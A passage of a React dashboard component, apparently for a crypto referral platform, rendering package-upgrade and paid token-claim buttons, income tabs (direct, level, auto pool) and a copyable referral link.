                                    {packageamount < "65" && packageamount >= '30' ? (

                                        isLoadings ? (
                                            <ColorRing
                                                colors={['#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1']}
                                                height={65}
                                                width={65}
                                            />
                                        ) : (


                                            <>


                                                {/* <button className='btn_m form_btn josefin w'
                                                disabled={packageamount <= '30'}
                                                onClick={UpgradePackage}>
                                                Upgrade package
                                            </button> */}

                                                <br /><br /><br /><br />

                                                <button className='btn_m form_btn josefin w'
                                                    //    disabled={packageamount <= '30'}
                                                    onClick={UpgradePackage}>
                                                    Upgrade With 65$
                                                </button>



                                            </>
                                        )
                                    ) : (


                                        <>

                                         

                                            <h4 className='text-center inter mt-3 mb-0 w i'>
                                                {packageamount < 30
                                                    ? 'Update to $30 package'
                                                    : packageamount === 65
                                                        ? 'Your package is already updated'
                                                        : 'Your package is already updated'}
                                            </h4>
                                        </>

                                    )}

                                </>)}
                            </div>
                        </div>
                        {/* <h2 className=''>Plan A </h2> */}

                        <div className='col-lg-3 col-md-3 col_p1'>
                            {/* <h2 className='sec_h2 w josefin text-center'>Tomax </h2> */}
                            <div className='sec2_box box-h'>

                                {isLoader ? (
                                        <div className="loader-container">
                                        <ColorRing
                                            colors={['#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1']}
                                            height={100}
                                        width={200}
                                        />
                                    </div>
                                ) : (
                                    <>


                                        <NavLink to='/Tomax'><h2 className='sec_h2 w josefin text-center'> Tomax {time}</h2></NavLink>

                                        {claimtomax === true ? (

                                            // <button
                                            //     className='btn_m form_btn josefin w r boxi'
                                            //     onClick={claimtoken}
                                            // >
                                            //     {/* {!claimtomax && <FontAwesomeIcon icon={faLock} style={{ marginRight: '8px' }} />} */}
                                            //     Claim
                                            // </button>
                                            <button
                                                className='btn_m form_btn josefin w r boxi'
                                                // onClick={claimtoken}
                                                onClick={claim}
                                                disabled={isClaiming}
                                                
                                            >
                                             {isClaiming ? 'Claiming...' : 'Claim'}
                                            </button>
                                        ) : (
                                            <>


                                            </>
                                        )}
                                        {tomexmetamask === true ? (

                                            // <button
                                            //     className='btn_m form_btn josefin w r boxi'
                                            //     onClick={claimtoken}
                                            // >
                                            //     {/* {!claimtomax && <FontAwesomeIcon icon={faLock} style={{ marginRight: '8px' }} />} */}
                                            //     Claim
                                            // </button>
                                            <button
                                                className='btn_m form_btn josefin w io boxi'
                                                // onClick={claim}
                                                onClick={claimtoken}
                                            >
                                                pay 2$ for claim
                                            </button>
                                        ) : (
                                            <>


                                            </>
                                        )}


                                    </>
                                )}



                            </div>
                        </div>
                        {/* <div className='col-lg-3 col-md-3 col_p1'>
                            {/* <h2 className='sec_h2 w josefin text-center'> 3.C Tomax </h2> 
                            <div className='sec2_box box-h'>




                                <h2 className='sec_h2 w josefin text-center'> 3.C TOMAX  {times}</h2>


                                {/* <button
                                    className='btn_m form_btn josefin w r'
                                    onClick={handleClick}
                                >
                                     {!claimtomaxs && <FontAwesomeIcon icon={faLock} style={{ marginRight: '8px' }} />}
                                    Claim
                                </button> 


                                {claimtomaxs === true ? (
                                    
                                    <button
                                            className='btn_m form_btn josefin w r boxi'
                                            onClick={claims}
                                            // disabled={packageamount<= 30}
                                        >

                                            Claim
                                        </button>
                                ) : (
                                    <>
                                       
                                    </>
                                )}
                                {tomexmetamasks === true ? (
                                    <button
                                        className='btn_m form_btn josefin w r boxi'
                                        onClick={claimtokens}
                                        
                                    >

                                        pay 2$ for 3.C
                                    </button>
                                ) : (
                                    <>
                                      {/* <h3>upgarde package with 65$</h3>  
                                    </>
                                )}
                                <br />





                            </div>
                        </div> */}
                        <div className='col-lg-3 col-md-3 col_p1'>
                            <div className='sec2_box box-h'>
                                {/* Conditionally show loader while data is loading */}
                                {isLoader ? (
                                    <div className="loader-container">
                                    <ColorRing
                                        colors={['#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1']}
                                        height={100}
                                        width={200}
                                    />
                                </div>
                                ) : (
                                    <>
                                        {/* Render content when data is loaded */}
                                        {/* <h2 className='sec_h2 w josefin text-center'> 3.C TOMAX {times}</h2> */}
                                        <NavLink to='/Tomaxthree'><h2 className='sec_h2 w josefin text-center'> 3.C Tomax {times}</h2></NavLink>
                                        {claimtomaxs === true && (
                                            <button
                                                className='btn_m form_btn josefin w r boxi'
                                                onClick={claims}
                                                disabled={isClaimings}
                                            >
                                                {isClaimings ? 'Claiming...' : 'Claim'}
                                            </button>
                                        )}

                                        {tomexmetamasks === true && (
                                            <button
                                                className='btn_m form_btn josefin w io boxi'
                                                onClick={claimtokens}
                                            >
                                                Pay $2 for 3.C
                                            </button>
                                        )}
                                    </>
                                )}
                            </div>
                        </div>


                    </div>
                    <p className='banner_text text-center inter mt-3 mb-0 w'>Admin Fee 10% plus USDT gas fee applicable from Withdrawal Amount Extra</p>
                </div>
            </section>
            <section className='sec03'>
                <div className='container'>
                    <ul class="nav nav-tabs sec3_tabs" id="myTab" role="tablist">
                        <li class="nav-item" role="presentation">
                            <button class="nav-link tab_btn tab_btn1 w josefin active" id="home-tab" data-bs-toggle="tab" data-bs-target="#home" type="button" role="tab" aria-controls="home" aria-selected="true">INCOME</button>
                        </li>
                        <li class="nav-item" role="presentation">
                            <button class="nav-link tab_btn tab_btn2 w josefin" id="profile-tab" data-bs-toggle="tab" data-bs-target="#profile" type="button" role="tab" aria-controls="profile" aria-selected="false">PERSONAL DETAILS</button>
                        </li>
                        <li class="nav-item" role="presentation">
                            <button class="nav-link tab_btn tab_btn3 w josefin mb-0" id="contact-tab" data-bs-toggle="tab" data-bs-target="#contact" type="button" role="tab" aria-controls="contact" aria-selected="false">PLANC INCOMES DETAILS</button>
                        </li>
                    </ul>
                    <div class="tab-content tab_con" id="myTabContent">
                        <div class="tab-pane fade show active" id="home" role="tabpanel" aria-labelledby="home-tab">
                            <div className='row'>
                                <div className='col-lg-3 col-md-6 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income1} />
                                        <h5 className='tab_box_title josefin w'>TOTAL INCOME</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.income.total_income}</p>
                                    </div>
                                </div>
                                <div className='col-lg-3 col-md-6 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income2} />
                                        <h5 className='tab_box_title josefin w'>DIRECT INCOME</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.income.direct_income}</p>
                                    </div>
                                </div>
                                <div className='col-lg-3 col-md-6 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income3} />
                                        <h5 className='tab_box_title josefin w'>LEVEL INCOME</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.income.level_income}</p>
                                    </div>
                                </div>
                                <div className='col-lg-3 col-md-6 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income4} />
                                        <h5 className='tab_box_title josefin w'>AUTO POOL INCOME</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.income.pool_income}</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="tab-pane fade" id="profile" role="tabpanel" aria-labelledby="profile-tab">
                            <div className='row'>
                                <div className='col-lg-4 col-md-4 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income5} />
                                        <h5 className='tab_box_title josefin w'>MY TOTAL MEMBERS</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.personal_detail.total_members}</p>
                                    </div>
                                </div>
                                <div className='col-lg-4 col-md-4 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income3} />
                                        <h5 className='tab_box_title josefin w'>MY DIRECTS</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.personal_detail.directs}</p>
                                    </div>
                                </div>
                                <div className='col-lg-4 col-md-4 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income6} />
                                        <h5 className='tab_box_title josefin w'>MY INCOME WITHDRAWALS</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.personal_detail.income_withdraw}</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="tab-pane fade" id="contact" role="tabpanel" aria-labelledby="contact-tab">
                            <div className='row'>
                                <div className='col-lg-4 col-md-4 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income1} />
                                        <h5 className='tab_box_title josefin w'>DIRECT INCOME</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.plan_income.direct_income}</p>
                                        <NavLink to='/threedirectincome' className='btn_m form_btn josefin w'>View Details</NavLink>
                                    </div>
                                </div>
                                <div className='col-lg-4 col-md-4 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income2} />
                                        <h5 className='tab_box_title josefin w'>LEVEL INCOME</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.plan_income.level_income}</p>
                                        <NavLink to='/threeincome' className='btn_m form_btn josefin w'>View Details</NavLink>
                                    </div>
                                </div>
                                <div className='col-lg-4 col-md-4 col-sm-6'>
                                    <div className='tab_box text-center'>
                                        <img className='tab_box_img' src={income3} />
                                        <h5 className='tab_box_title josefin w'>AUTO POOL INCOME</h5>
                                        <p className='tab_box_text inter mb-0'>{data && data.data.plan_income.pool_income}</p>
                                        <NavLink to='/threepoolincome' className='btn_m form_btn josefin w'>View Details</NavLink>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section className='sec04'>
                <div className='container'>
                    <h2 className='sec_heading_h2 w josefin text-center'>Your Referral Link</h2>
                    <div className='sec2_box'>
                        <h6 className='form_label josefin w'>Join first, then you can get your referral id.</h6>
                        <form className='form_join'>
                            {/* <input className='form_input inter w' type='text' placeholder={`${data && data.data.refferal_link}`} /> */}
                            <p className='form_input inter w' type='text' onClick={handleCopyLink} > {`${data && data.data.refferal_link}`} </p>
                            <input
                                className='btn_m form_btn josefin w mt-0 ms-3'
                                type='button'
                                value={copySuccess ? 'Copied!' : 'Copy Link'}
                                onClick={handleCopyLink}
                            />
                        </form>
                    </div>
                </div>
            </section>


        </>
    )
}

export default Dashboard